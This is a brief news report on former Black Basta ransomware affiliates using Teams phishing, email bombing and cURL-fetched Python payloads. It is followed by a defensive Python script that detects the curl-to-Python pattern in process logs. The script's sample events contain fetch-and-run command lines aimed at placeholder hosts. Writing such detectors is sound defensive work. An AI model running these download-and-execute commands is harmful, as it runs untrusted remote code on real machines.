Black Basta Veterans Target Firms via Teams, Python
Former affiliates of the Black Basta ransomware group have resurfaced with renewed cyberattack strategies, leveraging familiar and emerging techniques to breach corporate networks, according to a report by ReliaQuest. The attackers continue to rely on email bombing and phishing lures delivered through Microsoft Teams — methods previously linked to their operations — to gain initial access and maintain persistence within compromised environments.
New to their arsenal is the use of Python scripts executed via cURL commands, which are deployed to retrieve and run malicious payloads from remote servers. This added layer of automation enhances the attackers’ ability to execute code and potentially escalate privileges after initial access.
The tactics indicate a sustained evolution in approach while maintaining core elements of prior campaigns. Though the original Black Basta group’s status remains unclear, the reemergence of its techniques suggests that former operatives remain active in the threat landscape. The report highlights ongoing risks posed by persistent ransomware actors.
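For defenders, the cURL-then-Python fetch-and-run pattern described above can be hunted in process-creation telemetry. The sketch below is an added example, not taken from the ReliaQuest report; the event layout, hostnames, URLs, file paths and the five-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events: (host, timestamp, image, command line).
# The field layout is an assumption, loosely modelled on EDR process logs.
EVENTS = [
    ("WS-014", "2025-01-10T09:02:11", "curl.exe",
     r"curl -s -o C:\Users\Public\upd.py http://files.example.test/upd.py"),
    ("WS-014", "2025-01-10T09:02:19", "python.exe",
     r"python C:\Users\Public\upd.py"),
    ("WS-022", "2025-01-10T10:15:00", "curl.exe",
     "curl -o report.csv https://intranet.example.test/report.csv"),
    ("WS-031", "2025-01-10T11:40:05", "cmd.exe",
     "cmd /c curl -s http://files.example.test/s.py | python -"),
    ("WS-014", "2025-01-10T15:30:00", "python.exe",
     r"python C:\Tools\backup.py"),
]

# curl writing its output to a .py file
OUT_FILE = re.compile(r"(?:-o|--output)\s+(\S+\.py)\b", re.I)
# curl output piped straight into a Python interpreter
PIPE_TO_PY = re.compile(
    r"\bcurl(?:\.exe)?\b[^|]*\|\s*python[\d.]*(?:\.exe)?\b", re.I)
WINDOW = timedelta(minutes=5)  # assumed correlation window


def detect(events):
    """Return (host, timestamp, reason) for each curl-to-Python execution."""
    alerts = []
    downloads = {}  # (host, lowercased script path) -> download time
    for host, ts, image, cmdline in sorted(events, key=lambda e: e[1]):
        when = datetime.fromisoformat(ts)
        if PIPE_TO_PY.search(cmdline):
            alerts.append((host, ts, "curl output piped to python"))
        elif image.lower().startswith("curl"):
            m = OUT_FILE.search(cmdline)
            if m:
                downloads[(host, m.group(1).lower())] = when
        elif image.lower().startswith("python"):
            for (dl_host, path), dl_time in downloads.items():
                if (dl_host == host and path in cmdline.lower()
                        and when - dl_time <= WINDOW):
                    alerts.append(
                        (host, ts, f"python ran curl-downloaded script {path}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The benign CSV download and the unrelated `backup.py` run produce no alert; only the download-then-execute pair and the piped invocation are flagged.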
